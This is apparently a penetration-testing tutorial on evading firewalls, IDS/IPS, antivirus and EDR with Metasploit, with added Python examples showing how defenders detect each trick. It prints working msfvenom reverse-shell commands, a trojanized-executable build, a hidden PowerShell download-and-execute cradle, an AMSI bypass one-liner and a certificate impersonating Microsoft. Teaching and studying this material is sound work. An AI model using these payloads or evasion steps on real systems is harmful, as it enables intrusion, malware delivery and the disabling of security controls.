
🛡️ Firewall & IDS/IPS Evasion

During a real-world engagement, your payloads and exploit traffic will encounter network-level defenses (firewalls, IDS/IPS) and host-level defenses (antivirus, EDR). This page covers techniques for bypassing these controls using Metasploit and complementary tools.


1️⃣ Understanding the Defenses

| Defense | Layer | How It Works |
|---|---|---|
| Firewall | Network | Blocks traffic based on IP, port, protocol, and direction rules. |
| IDS (Intrusion Detection System) | Network | Monitors traffic and alerts on known attack signatures. Does not block. |
| IPS (Intrusion Prevention System) | Network | Like IDS, but actively blocks malicious traffic in real-time. |
| Antivirus (AV) | Host | Scans files on disk for known malware signatures and heuristics. |
| EDR (Endpoint Detection & Response) | Host | Monitors process behavior, memory, and API calls in real-time. Goes beyond file scanning. |

Concept

Evasion is a cat-and-mouse game. Techniques that worked yesterday may be detected today. Always test your payloads against the target's specific defenses in a lab before using them in an engagement.


2️⃣ Firewall Evasion

Using Common Egress Ports

Most firewalls allow outbound traffic on common ports. Use these for your reverse shells:

# Port 443 (HTTPS) — almost always allowed outbound
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.2 LPORT=443 \
  -f exe -o shell_443.exe

# Port 80 (HTTP)
msfvenom -p windows/x64/meterpreter/reverse_http \
  LHOST=10.10.14.2 LPORT=80 \
  -f exe -o shell_80.exe

# Port 53 (DNS) — often allowed for DNS resolution
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=53 \
  -f exe -o shell_53.exe

Tip

reverse_https on port 443 is the gold standard for firewall evasion. The traffic looks like normal HTTPS browsing and is encrypted, making deep packet inspection (DPI) much harder.

Encrypted Payloads (HTTPS)

# In MSFconsole, set up an HTTPS handler
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 443
msf6 > set HandlerSSLCert /path/to/your/cert.pem    # Use a custom SSL cert
msf6 > exploit -j

Using a valid SSL certificate (e.g., from Let's Encrypt) makes the traffic indistinguishable from legitimate HTTPS browsing.


3️⃣ IDS/IPS Evasion

Payload Fragmentation

IDS/IPS systems reassemble packets to inspect payloads. Fragmenting your traffic can sometimes bypass older systems:

# In Nmap (for initial scanning)
nmap -f -sS -p 445 10.10.10.5         # Fragment packets
nmap --mtu 16 -sS -p 445 10.10.10.5   # Custom MTU fragmentation
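Why fragmentation only helps against a sensor that inspects fragments in isolation is easiest to see in code. The following is an added Python example (not from the original page and not Nmap or Metasploit code): it splits a constructed stream at an 8-byte-aligned MTU, runs a naive per-fragment signature match, then reassembles the fragments (out-of-order and overlapping arrivals included) before matching. The signature, the stream and the `(offset, chunk)` fragment shape are constructed stand-ins for an IDS content rule and IP fragments.

```python
from typing import List, Tuple

# Constructed stand-ins for an IDS content signature and the application data
# it should match; not real Nmap or Metasploit traffic.
SIGNATURE = b"SMB_EXPLOIT_MARKER"
STREAM = b"\x00" * 20 + b"NEGOTIATE " + SIGNATURE + b" trailing data" + b"\x00" * 10

Fragment = Tuple[int, bytes]  # (byte offset within the stream, payload chunk)


def fragment(stream: bytes, mtu: int) -> List[Fragment]:
    """Split a stream into fragments of at most `mtu` bytes, the way
    `nmap -f` / `--mtu` does at the IP layer. IP fragment offsets are
    expressed in 8-byte units, so every fragment but the last must be a
    multiple of 8 bytes long."""
    if mtu <= 0 or mtu % 8:
        raise ValueError("fragment size must be a positive multiple of 8")
    return [(off, stream[off:off + mtu]) for off in range(0, len(stream), mtu)]


def match_per_fragment(frags: List[Fragment], signature: bytes) -> bool:
    """Naive inspection: test each fragment on its own. Misses any
    signature that straddles a fragment boundary."""
    return any(signature in chunk for _, chunk in frags)


def reassemble(frags: List[Fragment]) -> bytes:
    """Rebuild the stream from fragments that may arrive out of order.
    Overlaps keep the bytes placed first; a gap raises, because a sensor
    cannot inspect a stream it has not fully received."""
    buf = bytearray()
    for off, chunk in sorted(frags, key=lambda f: f[0]):
        if off > len(buf):
            raise ValueError(f"missing fragment before offset {off}")
        buf.extend(chunk[len(buf) - off:])  # drop any already-placed prefix
    return bytes(buf)


def match_reassembled(frags: List[Fragment], signature: bytes) -> bool:
    """What a sensor with fragment reassembly sees."""
    return signature in reassemble(frags)


if __name__ == "__main__":
    small = fragment(STREAM, 16)
    print("per-fragment match, mtu 16:", match_per_fragment(small, SIGNATURE))
    print("reassembled match, mtu 16:", match_reassembled(small[::-1], SIGNATURE))
```

With a 16-byte MTU the 18-byte signature can never sit inside one fragment, so per-fragment matching fails; with a 24-byte MTU the same signature happens to land inside the second fragment and is caught. That dependence on boundary alignment is exactly why current sensors (Snort's frag3 preprocessor, Suricata's defrag engine) reassemble before applying content rules, and why the page says this trick mostly works against older systems.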

Timing and Throttling

Slow down your scans and exploit attempts to avoid triggering rate-based IDS alerts:

# Nmap slow scan
nmap -T1 -sV -p- 10.10.10.5     # Paranoid timing (very slow but stealthy)

# In Metasploit, reduce thread count and add delays
set THREADS 1
set ConnectTimeout 30
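The flip side of both the egress-port advice in section 2 and the throttling advice above is what a defender can still see: a reverse_https session on 443 blends in per packet, but it reconnects on a schedule, and a -T1 scan stays under any per-minute rate threshold while still touching many ports over an hour. The following added Python example (not from the original page or from any Metasploit/Nmap source) runs three checks over a constructed connection log shaped like Zeek's conn.log: a short-window rate count (what a naive rule measures), a beaconing check on inter-connection jitter, and a long-window distinct-port count. The thresholds (`min_hits`, `max_jitter`, `window`, `min_ports`) are assumptions chosen for the sample data.

```python
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Tuple

Conn = Tuple[int, str, str, int]  # (timestamp in seconds, src ip, dst ip, dst port)

# Constructed connection records in the shape of a Zeek conn.log; not a capture.
SAMPLE_LOG: List[Conn] = []
# 1) One workstation contacting one external host on 443 every ~60 s for 10 minutes.
for i in range(10):
    SAMPLE_LOG.append((1000 + 60 * i + (i % 3) - 1, "10.0.0.7", "203.0.113.9", 443))
# 2) The same workstation browsing normally: several hosts on 443 at irregular times.
for t, dst in [(1003, "198.51.100.20"), (1017, "198.51.100.21"),
               (1250, "198.51.100.22"), (1251, "198.51.100.20"), (1480, "198.51.100.23")]:
    SAMPLE_LOG.append((t, "10.0.0.7", dst, 443))
# 3) A slow scan: one source touching 30 different ports on one host, one every 2 minutes.
for i in range(30):
    SAMPLE_LOG.append((2000 + 120 * i, "10.0.0.42", "10.0.0.5", 1 + i))


def peak_rate(log: List[Conn], src: str, window: int = 60) -> int:
    """Most connections from `src` inside any `window` seconds: what a simple
    threshold rule measures, and what slow timing keeps low."""
    times = sorted(ts for ts, s, _, _ in log if s == src)
    return max((sum(1 for t in times[i:] if t - t0 < window)
                for i, t0 in enumerate(times)), default=0)


def find_beacons(log: List[Conn], min_hits: int = 6, max_jitter: float = 0.2):
    """Flag (src, dst, port) flows whose inter-connection gaps are regular:
    coefficient of variation at or below `max_jitter` over at least
    `min_hits` connections. Returns [(flow, mean gap in seconds)]."""
    by_flow: Dict[Tuple[str, str, int], List[int]] = defaultdict(list)
    for ts, src, dst, dport in log:
        by_flow[(src, dst, dport)].append(ts)
    beacons = []
    for flow, times in by_flow.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons.append((flow, round(avg, 1)))
    return beacons


def find_slow_scans(log: List[Conn], window: int = 3600, min_ports: int = 20):
    """Flag (src, dst) pairs that touch at least `min_ports` distinct ports
    within any `window` seconds, however slowly. Returns [((src, dst), ports)]."""
    by_pair: Dict[Tuple[str, str], List[Tuple[int, int]]] = defaultdict(list)
    for ts, src, dst, dport in log:
        by_pair[(src, dst)].append((ts, dport))
    hits = []
    for pair, events in by_pair.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                hits.append((pair, len(ports)))
                break
    return hits


if __name__ == "__main__":
    print("scanner peak rate per minute:", peak_rate(SAMPLE_LOG, "10.0.0.42"))
    print("beacons:", find_beacons(SAMPLE_LOG))
    print("slow scans:", find_slow_scans(SAMPLE_LOG))
```

The scanner never exceeds one connection per minute, so `peak_rate` alone says nothing, yet the hour-long distinct-port count flags it. The 443 session is flagged by its regularity, not its port: the browsing flows to the same destination port are too irregular and too few. In practice the jitter threshold has to be tuned per environment, since software updaters and monitoring agents beacon as well.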

Protocol Manipulation

Some IDS/IPS rules expect traffic to follow standard protocol formats. Deviating can bypass rule matching:

# Use non-standard HTTP methods or malformed headers
# (Configured within specific exploit modules)
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

4️⃣ Antivirus Evasion

Metasploit Evasion Modules

Metasploit includes dedicated evasion modules (introduced in MSF 5):

msf6 > show evasion

# Example: Generate a Windows EXE that evades AV
msf6 > use evasion/windows/windows_defender_exe
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4444
msf6 > run

Multi-Encoding (MSFVenom)

# Apply multiple encoding passes
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 7 \
  -f exe -o encoded_shell.exe

Note

Multi-encoding with shikata_ga_nai is no longer effective against modern AV. Vendors have signatures for the decoder stub itself. This technique is included for educational purposes.
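Alongside the decoder-stub signatures the note mentions, AV engines apply a generic heuristic that multi-encoding makes worse rather than better: an encoded payload appended to an executable is a block of near-random bytes, and its Shannon entropy stands out against ordinary code and text. The following added Python example (not from the original page, and using no Metasploit code) computes per-window entropy over a constructed sample file whose second half is text XOR-ed with a random keystream, standing in for an encoder's output. The window size and 7.0 bits/byte threshold are assumptions; real scanners pair this with section-header checks and PE parsing.

```python
import math
import random
from collections import Counter
from typing import List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, from 0.0 (one repeated value) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 1024,
                         threshold: float = 7.0) -> List[Tuple[int, float]]:
    """Slide a fixed window over `data` and return (offset, entropy) for each
    window above `threshold`. Ordinary x86 code and text measure roughly
    4 to 6.5 bits/byte; encoded, compressed or encrypted regions approach 8."""
    out = []
    for off in range(0, len(data) - window + 1, window):
        h = shannon_entropy(data[off:off + window])
        if h > threshold:
            out.append((off, round(h, 2)))
    return out


# Constructed sample file: 2 KiB of low-entropy text followed by 2 KiB of the
# same text XOR-ed with a random keystream, standing in for the encoded blob
# an encoder leaves behind. Synthetic data, not a Metasploit payload.
PLAIN = (b"This program cannot be run in DOS mode.\r\n" * 64)[:2048]
_rng = random.Random(1337)
KEYSTREAM = bytes(_rng.randrange(256) for _ in range(2048))
ENCODED = bytes(p ^ k for p, k in zip(PLAIN, KEYSTREAM))
SAMPLE_FILE = PLAIN + ENCODED


def suspicious_regions(data: bytes = SAMPLE_FILE) -> List[int]:
    """Offsets of the windows in `data` that exceed the entropy threshold."""
    return [off for off, _ in high_entropy_windows(data)]


if __name__ == "__main__":
    for off in range(0, len(SAMPLE_FILE), 1024):
        print(f"offset {off:5d}: {shannon_entropy(SAMPLE_FILE[off:off + 1024]):.2f} bits/byte")
    print("flagged:", suspicious_regions())
```

Only the two encoded windows are flagged. Adding more encoding passes does not lower this reading, which is one reason the `-i 7` approach buys nothing against a modern engine: the stub is signatured and the blob behind it is still obviously not code.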

Custom Executable Templates

# Inject payload into a legitimate executable
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.2 LPORT=443 \
  -x /path/to/legitimate_app.exe -k \
  -f exe -o trojanized_app.exe

Sleep Techniques (Sandbox Evasion)

Many AV solutions run suspicious files in a sandbox for a few seconds to observe behavior. Adding a sleep delay can outlast the sandbox:

# In MSFconsole advanced options
set InitialAutoRunScript "sleep 60"
# Or use the PrependMigrate option to auto-migrate (buys time)
set PrependMigrate true
set PrependMigrateProc svchost.exe

5️⃣ Advanced Evasion Techniques

Process Hollowing

Replace the memory of a legitimate process with your payload:

# Meterpreter post module
meterpreter > run post/windows/manage/migrate

In-Memory Execution (Fileless)

Avoid writing to disk entirely by using PowerShell or reflective DLL injection:

# PowerShell-based payload delivery
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.2 LPORT=443 \
  -f psh-reflection -o shell.ps1

# On the target (download and execute in memory)
powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2/shell.ps1')"

SSL Certificate Pinning

Use a custom or legitimate SSL certificate to make HTTPS traffic blend in:

# Generate a self-signed cert impersonating a real site
openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout server.key -out server.pem \
  -subj "/CN=www.microsoft.com/O=Microsoft/C=US"

# Use it in the handler
msf6 > set HandlerSSLCert /path/to/server.pem
msf6 > set StagerVerifySSLCert true

AMSI Bypass (Windows 10+)

AMSI (Anti-Malware Scan Interface) inspects PowerShell and .NET in real-time. Metasploit includes some AMSI bypass techniques, but they are frequently patched.

# In Meterpreter
meterpreter > load powershell
meterpreter > powershell_execute "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"

Note

AMSI bypasses are rapidly detected and patched by Microsoft. This specific one-liner has been detected since 2020. Current bypasses require more sophisticated obfuscation.
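Both the in-memory PowerShell delivery above and the AMSI one-liner in this section leave telemetry even though nothing touches disk: the launching command line appears in a process-creation event (Security Event ID 4688 with command-line auditing, or Sysmon Event ID 1) and the executed script text appears in PowerShell script block logging (Event ID 4104). The following added Python example (not from the original page and not Metasploit code) runs three regex rules over constructed events built from the two commands this page shows plus two benign ones. The rule patterns and the sample events are assumptions made for the example.

```python
import re
from typing import List, Tuple

# Detection rules over PowerShell telemetry. Event ID 4688 (Security log, with
# command-line auditing on) or Sysmon 1 carries the process command line;
# Event ID 4104 (Microsoft-Windows-PowerShell/Operational, script block logging
# on) carries the script text actually executed, even when it never touched disk.
RULES: List[Tuple[str, re.Pattern]] = [
    # download-and-execute cradle: an expression evaluator plus a web fetch
    ("download-cradle",
     re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b")),
    # hidden window combined with an execution-policy bypass, in either order
    ("hidden-window-bypass",
     re.compile(r"(?i)(?=.*-w\w*\s+hidden)(?=.*-e[xp]\w*\s+bypass)")),
    # reflection against the AMSI helper class or its initialisation flag
    ("amsi-tamper",
     re.compile(r"(?i)AmsiUtils|amsiInitFailed|AmsiScanBuffer")),
]

# Constructed events as (event id, text); not collected from a real host.
SAMPLE_EVENTS = [
    # the in-memory delivery command from this page, as a process command line
    ("4688", "powershell -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
             ".DownloadString('http://10.10.14.2/shell.ps1')\""),
    # the AMSI one-liner from this page, as logged script block text
    ("4104", "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
    # benign administration script block
    ("4104", "Get-ChildItem C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB }"),
    # benign download that is saved, not executed
    ("4688", "powershell -c \"Invoke-WebRequest https://example.com/report.csv -OutFile report.csv\""),
]


def scan_events(events=SAMPLE_EVENTS) -> List[Tuple[str, str]]:
    """Return (event id, rule name) for every rule that fires on each event."""
    findings = []
    for event_id, text in events:
        for name, rx in RULES:
            if rx.search(text):
                findings.append((event_id, name))
    return findings


if __name__ == "__main__":
    for event_id, rule in scan_events():
        print(f"event {event_id}: {rule}")
```

The cradle fires two rules from the command line alone, and the AMSI tamper is caught from the script block text that AMSI itself never got to scan. Script block logging records what ran regardless of whether AMSI was working, which is why the note above holds: disabling the scanner does not remove the log.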


6️⃣ External Evasion Tools

| Tool | Description |
|---|---|
| Veil | Framework for generating AV-evading payloads. |
| Shellter | Dynamic PE infector — injects shellcode into legitimate Windows executables. |
| Nim / Go / Rust compilers | Writing custom loaders in less-common languages can evade signature-based detection. |
| Donut | Converts .NET assemblies into position-independent shellcode for in-memory execution. |
| ScareCrow | EDR-focused evasion tool that uses direct syscalls and process injection. |

7️⃣ Gotchas

Note

Test against the target's actual defenses. What bypasses Windows Defender may not bypass CrowdStrike or SentinelOne. Always identify the target's security stack during reconnaissance.

Note

Evasion is temporary. AV vendors update signatures daily. A payload that bypasses detection today may be flagged tomorrow. Generate fresh payloads for each engagement.

Note

Network-level evasion is separate from host-level evasion. Even if your payload evades AV, the network IDS/IPS may still detect the exploit traffic. You need to address both layers.

Note

Legal considerations. Some evasion techniques (e.g., disabling AV, tampering with security controls) may go beyond the scope of your authorized testing. Confirm with your client/scope document before using aggressive evasion techniques.


Warning

Evasion techniques are designed for authorized penetration testing. Using them to bypass security controls without permission is illegal and unethical.